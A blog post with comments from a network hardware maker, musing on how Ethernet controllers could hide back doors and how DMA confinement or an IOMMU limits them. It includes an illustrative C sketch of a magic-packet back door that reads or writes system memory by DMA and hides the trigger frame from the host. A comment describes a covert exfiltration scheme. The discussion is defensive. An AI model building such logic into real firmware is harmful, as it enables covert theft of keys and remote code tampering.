2015-04-28

Back doors

Obviously, especially since Snowden, we are all concerned over "back doors" in systems.

But we have had some interesting discussions in the office. Working on FireBrick, we make hardware and software from scratch. But even then we are using standard parts: processors, Ethernet controllers, and so on.

One of the mind games we play is trying to work out how someone could infiltrate us, whether by social engineering, technical means, or whatever. It is a fun game, but one worth playing, in case we find any defences.

So we pondered: what if the chips we use had back doors? What could those back doors be, and how could they work?

Well, I had two ideas. One was something that actively tries to pass information to "them" via Ethernet frames. But such a system would be spotted, if not by us during testing, then by millions of other people.

But a simpler idea is something passive - even in a simple Ethernet controller. These things have access to the memory of the system via the bus and DMA and so on. They need this to send and receive legitimate packets.

If I wanted to implant a back door, I would make an Ethernet controller able to respond to a specially crafted packet. Instead of passing that to the processor as normal, it would take some action and send a reply packet. The action could simply be to allow reading or writing of system memory using the same DMA and memory access needed to send and receive normal packets.
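
Purely for illustration, here is roughly the shape such hidden receive-path logic might take. Everything in this sketch is invented: the magic cookie, the payload offset, and the dma_read/dma_write helpers are stand-ins for whatever a real controller's silicon would provide.

    /* Hypothetical sketch of a malicious controller's receive path.
     * All names and values here are invented for illustration. */
    #include <stdint.h>
    #include <string.h>

    #define MAGIC_COOKIE   0x5A17C0DEFEEDFACEULL  /* invented trigger value */
    #define PAYLOAD_OFFSET 42                     /* e.g. past Ethernet/IP/UDP headers */

    struct backdoor_cmd {
        uint64_t cookie;   /* must equal MAGIC_COOKIE to trigger */
        uint8_t  op;       /* 0 = read system memory, 1 = write it */
        uint32_t len;      /* number of bytes to read or write */
        uint64_t addr;     /* physical address to access by DMA */
    };

    /* Provided by the rest of the (hypothetical) silicon. */
    extern void dma_read(uint64_t addr, void *buf, uint32_t len);
    extern void dma_write(uint64_t addr, const void *buf, uint32_t len);
    extern void send_reply_frame(const void *buf, uint32_t len);
    extern void deliver_to_host(const uint8_t *frame, uint32_t len);

    /* Called for every received frame, before it is handed to the host. */
    void rx_frame(const uint8_t *frame, uint32_t frame_len)
    {
        struct backdoor_cmd cmd;

        if (frame_len >= PAYLOAD_OFFSET + sizeof cmd) {
            memcpy(&cmd, frame + PAYLOAD_OFFSET, sizeof cmd);
            if (cmd.cookie == MAGIC_COOKIE) {
                if (cmd.op == 0) {
                    /* Leak memory: DMA it out and send it back in a reply. */
                    uint8_t buf[1024];
                    uint32_t n = cmd.len < sizeof buf ? cmd.len : (uint32_t)sizeof buf;
                    dma_read(cmd.addr, buf, n);
                    send_reply_frame(buf, n);
                } else {
                    /* Patch memory with the bytes following the command. */
                    dma_write(cmd.addr, frame + PAYLOAD_OFFSET + sizeof cmd, cmd.len);
                }
                return;   /* the frame is never shown to the host CPU */
            }
        }
        deliver_to_host(frame, frame_len);   /* normal path */
    }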

The upshot would be that nothing would be detectable unless targeted.

But if targeted, the packets would look like normal IP packets. The payloads could even be scrambled or encrypted in some way. It could be used to attack anything that is accessible on the Internet and provide a way to access the running memory of the system remotely.

This could allow access to private keys for encryption and allow patching of code live to add proper back doors.

Now, this could apply to an Ethernet controller chip, or even a library part included in a custom logic gate array. It could be in an Ethernet card or whatever. The back door itself could be tiny in terms of silicon if all it does is read and write memory in response to some simple packet. Even people making their own silicon could find they have a back door!

The only deterrent is the damage to the manufacturer's reputation if caught out... Is that enough to protect us? What if some large company making such devices caved in to pressure? What if a few key employees caved in to a bribe? Scary?

Update: We have checked the coding on the FireBricks and the memory mapping does mean the Ethernet controller can only access the packet buffer memory and not general RAM or Flash which may otherwise hold keys, etc. So we are on top of this risk already to some extent :-)
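
For illustration, this is the general shape of that defence: give the DMA-capable controller a window onto the packet buffers and nothing else. The register names, addresses and the window mechanism below are invented for the example; this is not FireBrick's actual chipset code.

    /* Illustrative only: confine a bus-mastering Ethernet controller to a
     * dedicated packet-buffer region. Registers and addresses are invented. */
    #include <stdint.h>

    #define PKT_BUF_BASE 0x20010000u   /* start of packet buffer RAM */
    #define PKT_BUF_SIZE 0x00010000u   /* 64 KiB of buffers */

    /* Hypothetical bus-matrix registers controlling the Ethernet DMA master */
    #define DMA_WIN_BASE  (*(volatile uint32_t *)0x400F0000u)
    #define DMA_WIN_LIMIT (*(volatile uint32_t *)0x400F0004u)
    #define DMA_WIN_CTRL  (*(volatile uint32_t *)0x400F0008u)

    void confine_ethernet_dma(void)
    {
        DMA_WIN_BASE  = PKT_BUF_BASE;
        DMA_WIN_LIMIT = PKT_BUF_BASE + PKT_BUF_SIZE - 1u;
        DMA_WIN_CTRL  = 1u;   /* enable: any access outside the window faults */
    }

Even with such a window in place a rogue controller could still see or tamper with packets in flight, but it could not reach the Flash or the RAM that holds keys.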

12 comments:

  1. Hmmm. Home-made closed-source crypto implementations are scarier! To me at least. Unless you have a big bunch of the world's most experienced crypto engineers and mathematicians, that is. Crypto is hard... don't do it yourself.

    Or maybe "Cliff", as you said in your previous post, is a pseudonym for a much bigger and well-funded entity ;)

  2. @batfastad - Rev's not talking about implementing this themselves, rather that it could already be in the components they buy in.

    An obvious defence is to firewall the Ethernet controller and its associated memory from system memory, via something which prevents the controller having unrestricted access to system memory.

  3. The NSA's project FASHIONCLEFT involves three devices. Firstly there's a router or intelligent switch inside an organisation that has been compromised by the NSA - we'll call that W. Then there's a PC, laptop, tablet, whatever, that has also been compromised by a separate route - let's call that P. And finally there's a device out in the public Internet infrastructure, maybe a Level 3 router for the US West Coast for example - let's call that B - which the NSA has installed or modified with court approval.

    So let's say your organisation has this very tight firewall rule. No externally initiated connections at all, and outbound only HTTPS on port 443. You have a strict policy of investigating any unusual activity. Device P has some information on it that matches an outstanding NSA request - it sends this towards W, but not directly to it (e.g. sending to a device on a network W routes). W catches this data, makes a copy and drops the "original" packet on the floor. Now comes the clever part. W watches for traffic leaving the organisation which will pass through B and it hides the stolen information in that traffic. When the traffic reaches B, B removes the hidden information and allows it to continue to its destination. The destination IP address, so often thought of as a smoking gun, is actually irrelevant!

    So even if the organisation realises something happened, and investigates, they will most likely find that P was sending data to some unrelated device like a printer or phone, and there's nothing wrong with that device. If they look at their firewall they'll see that only legitimate-seeming data went out, to legitimate-seeming places, and none of those places is corrupted. They will never know the NSA was involved; there is no trace of the NSA anywhere, except for that seemingly unrelated equipment B. They may not even realise W was compromised.

    FASHIONCLEFT exists. It was so widely used that the main evidence we have for its existence is a Powerpoint slide deck about how to best handle the metadata from FASHIONCLEFT to retrieve the huge volume of data collected in the most useful way.

  4. Something like this?
    http://esec-lab.sogeti.com/static/publications/11-recon-nicreverse_slides.pdf

  5. Yes, this is a concern. I'm fairly sure some security vulnerabilities were found in Wi-Fi chips some time ago. You're assuming that any vulnerability would be the product of malice, though; it's just as likely to be unwitting, and then capitalized upon by "them".

    The only real way to fix this (other than using open source hardware, which doesn't really work well like open source software does, due to the high fabrication costs) is to use an IOMMU to restrict device access to DMA just as one does with OS processes.

    I get the impression OSes are finally starting to bother with this; IOMMUs have been common (though not ubiquitous) in PCs for some time, but have only really been used to enable OS virtualization. But if correctly configured, they could be used to distrust devices which use DMA, and ensure they only use the memory areas which they have been told to.
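
    For example, a rough sketch of the idea: give the NIC its own I/O page table so its DMA can only reach pages explicitly mapped for it. The functions below are simplified stand-ins, not a real kernel's IOMMU API.

      /* Rough sketch only: per-device I/O page table restricting DMA.
       * The functions are simplified stand-ins, not a real kernel API. */
      #include <stdint.h>
      #include <stddef.h>

      #define IOMMU_READ  0x1
      #define IOMMU_WRITE 0x2

      struct io_domain;   /* per-device translation table */

      extern struct io_domain *iommu_domain_create(void);
      extern int  iommu_map(struct io_domain *d, uint64_t iova, uint64_t phys,
                            size_t len, int prot);
      extern void iommu_attach_device(struct io_domain *d, int device_id);

      void attach_nic(int nic_id, uint64_t rx_ring_phys, uint64_t tx_ring_phys,
                      size_t ring_len)
      {
          struct io_domain *d = iommu_domain_create();

          /* The NIC may write received frames here... */
          iommu_map(d, 0x10000, rx_ring_phys, ring_len, IOMMU_WRITE);
          /* ...and read frames to transmit from here. Nothing else is
           * mapped, so DMA to any other address faults instead of
           * silently succeeding. */
          iommu_map(d, 0x20000, tx_ring_phys, ring_len, IOMMU_READ);

          iommu_attach_device(d, nic_id);
      }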

  6. RevK, are you saying that you (or Cliff) have written the IPsec stack that your hardware uses by hand and not used a third-party library? Do you have any plans to put the hardware through either the Common Criteria network device protection profile certification (https://www.commoncriteriaportal.org/pps/) or the UK's CPA VPN server protection profile (https://www.cesg.gov.uk/publications/Documents/sc_vpn_ipsec_security_gateway.pdf) so that we, the users, know that it's doing sensible things?

    In your update you say "Update: We have checked the coding on the FireBricks and the memory mapping does mean the Ethernet controller can only access the packet buffer memory and not general RAM or Flash which may otherwise hold keys, etc. So we are on top of this risk already to some extent :-)" - is that enforced by hardware or software?

    Have you published your coding / build standards (or do you follow an open source one)? Is there any form of secure development lifecycle?

  7. I can probably go into a lot more detail on this, I am sure. I thought I had blogged on some of the s/w development stuff before. We have a small team, but we have decades of experience (including myself) working in large companies and s/w projects with mountains of bureaucracy. The end result is we have the necessary systems in place (source control, backups, signed releases, and so on) but can be pragmatic when necessary. We have not had the VPN stuff tested externally, but have done several interoperability tests ourselves - happy to work with someone wanting to do such tests. As for the Ethernet, it is the MMU config in the chipset, so hardware, but obviously configured by the s/w we run in the processor - I am not aware of any way an errant Ethernet controller could bypass that in the current design.

  8. I deal with mountains of bureaucracy every day at work; I'm sure I spend no more than 25% of my time doing productive software development. This is an increasing problem in the software industry - we're drowning in crap.

  9. Can an Ethernet controller access the packet buffers of other interfaces? If so, it could bypass any encryption by retrieving packets from the internal interface after the FireBrick has decrypted them.

  10. You meant Snowden right? Snowdon's the mountain in Wales :P

  11. Even experienced software engineers can get crypto wrong. The fact you're reimplementing it yourself, and then not releasing the source for public scrutiny, is a massive signal - to me at least - that using a firebrick is a risky proposition.

    Replies
    1. I understand - and we have had some long discussions about this - and it comes down to trust. If we release the code, which we could, even if only for the crypto stuff, you have no way to know that it is the code we are running. If we released the lot and a build system, we would compromise one of the security features: all the code is signed to avoid bogus s/w releases by third parties with back doors. Ultimately, if you don't trust us, we cannot really fix that even by releasing the code.


